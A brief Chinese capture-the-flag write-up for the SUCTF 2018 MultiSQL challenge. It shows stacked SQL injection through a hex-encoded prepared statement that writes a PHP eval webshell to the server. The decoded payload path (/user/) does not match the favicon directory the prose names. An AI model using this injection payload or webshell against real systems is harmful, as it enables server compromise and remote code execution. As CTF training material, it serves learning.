[SUCTF 2018]MultiSQL
2021/10/18 2:14:01
本文主要是介绍[SUCTF 2018]MultiSQL,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
[SUCTF 2018]MultiSQL
0x01前言
- 堆叠注入写shell
0x02预编译写shell
需要执行的语句select '<?php @eval($_POST[abc]);?>' into outfile '/var/www/html/favicon/abc.php'
为什么选favicon呢?写题目的时候我也不知道,后来上了shell我才知道,其他目录是没有写权限的
payload=set @a=0x73656C65637420273C3F70687020406576616C28245F504F53545B6162635D293B3F3E2720696E746F206F757466696C6520272F7661722F7777772F68746D6C2F757365722F6162632E70687027;prepare b from @a;execute b;
bp执行记得进行url编码。
flag在根目录
这篇关于[SUCTF 2018]MultiSQL的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-30uniAPP 实现全屏左右滚动滚动的效果-icode9专业技术文章分享
- 2024-06-30如何在本地使用授权或插件-icode9专业技术文章分享
- 2024-06-30伪静态规则配置方法汇总-icode9专业技术文章分享
- 2024-06-29易优CMS安装常见问题汇总-icode9专业技术文章分享
- 2024-06-28易优新手必读安装教程-icode9专业技术文章分享
- 2024-06-28忘记eyoucms后台密码怎么办?-icode9专业技术文章分享
- 2024-06-26终极指南:Scrum中如何设置需求优先级
- 2024-06-26AI大模型企业应用实战(25)-为Langchain Agent添加记忆功能
- 2024-06-26小白家庭 nas 搭建方案-icode9专业技术文章分享
- 2024-06-23AI大模型企业应用实战(14)-langchain的Embedding